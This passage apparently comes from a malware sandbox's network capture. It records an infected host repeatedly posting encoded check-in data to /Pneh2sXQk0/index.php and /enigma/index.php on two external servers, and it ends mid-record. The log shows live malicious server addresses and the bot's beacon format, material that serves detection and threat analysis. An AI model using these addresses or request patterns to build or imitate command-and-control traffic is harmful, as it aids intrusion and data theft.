Session ID  Source IP  Source Port  Destination IP  Destination Port
1444  192.168.2.5  51299  193.233.132.56  80
Timestamp  Bytes transferred  Direction  Data
Apr 19, 2024 03:36:36.199856997 CEST  158  OUT  POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:36:36.448268890 CEST  219  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:36 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID  Source IP  Source Port  Destination IP  Destination Port
1445  192.168.2.5  51300  193.233.132.167  80
Timestamp  Bytes transferred  Direction  Data
Apr 19, 2024 03:36:36.684195042 CEST  309  OUT  POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:36:36.937964916 CEST  196  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:36 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID  Source IP  Source Port  Destination IP  Destination Port
1446  192.168.2.5  51301  193.233.132.56  80
Timestamp  Bytes transferred  Direction  Data
Apr 19, 2024 03:36:36.700627089 CEST  312  OUT  POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:36:36.952917099 CEST  196  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:36 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID  Source IP  Source Port  Destination IP  Destination Port
1447  192.168.2.5  51302  193.233.132.167  80
Timestamp  Bytes transferred  Direction  Data
Apr 19, 2024 03:36:37.275361061 CEST  155  OUT  POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:36:37.522259951 CEST  197  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:37 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID  Source IP  Source Port  Destination IP  Destination Port
1448  192.168.2.5  51303  193.233.132.56  80
Timestamp  Bytes transferred  Direction  Data
Apr 19, 2024 03:36:37.286827087 CEST  158  OUT  POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:36:37.530177116 CEST  219  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:37 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session ID   Source IP   Source Port   Destination IP   Destination Port
                                                                                                                                                                                                                                      1449   192.168.2.5   51304   193.233.132.167   80
                                                                                                                                                                                                                                      Timestamp   Bytes transferred   Direction   Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:37.775175095 CEST   309   OUT   POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:38.025163889 CEST   196   IN   HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:37 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID   Source IP   Source Port   Destination IP   Destination Port
                                                                                                                                                                                                                                      1450   192.168.2.5   51305   193.233.132.56   80
                                                                                                                                                                                                                                      Timestamp   Bytes transferred   Direction   Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:37.782433987 CEST   312   OUT   POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:38.033735037 CEST   196   IN   HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:37 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID   Source IP   Source Port   Destination IP   Destination Port
                                                                                                                                                                                                                                      1451   192.168.2.5   51306   193.233.132.167   80
                                                                                                                                                                                                                                      Timestamp   Bytes transferred   Direction   Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:38.369090080 CEST   155   OUT   POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:38.614622116 CEST   197   IN   HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:38 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session ID   Source IP   Source Port   Destination IP   Destination Port
                                                                                                                                                                                                                                      1452   192.168.2.5   51307   193.233.132.56   80
                                                                                                                                                                                                                                      Timestamp   Bytes transferred   Direction   Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:38.373883009 CEST   158   OUT   POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:38.625691891 CEST   219   IN   HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:38 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session ID   Source IP   Source Port   Destination IP   Destination Port
                                                                                                                                                                                                                                      1453   192.168.2.5   51308   193.233.132.167   80
                                                                                                                                                                                                                                      Timestamp   Bytes transferred   Direction   Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:38.867949009 CEST   309   OUT   POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:39.120127916 CEST   196   IN   HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:38 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID   Source IP   Source Port   Destination IP   Destination Port
                                                                                                                                                                                                                                      1454   192.168.2.5   51309   193.233.132.56   80
                                                                                                                                                                                                                                      Timestamp   Bytes transferred   Direction   Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:38.875552893 CEST   312   OUT   POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:39.124686003 CEST   196   IN   HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:38 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1455 | 192.168.2.5 | 51310 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:36:39.461416960 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:36:39.707493067 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:39 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1456 | 192.168.2.5 | 51311 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:36:39.461534023 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:36:39.703552008 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:39 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1457 | 192.168.2.5 | 51312 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:36:39.961059093 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:36:40.217286110 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:40 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1458 | 192.168.2.5 | 51313 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:36:39.962671995 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:36:40.216438055 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:40 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1459 | 192.168.2.5 | 51314 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:36:40.548809052 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:36:40.797430992 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:40 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1460 | 192.168.2.5 | 51315 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:36:40.555805922 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:36:40.803416014 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:40 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1461 | 192.168.2.5 | 51316 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:36:41.049673080 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:36:41.303070068 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
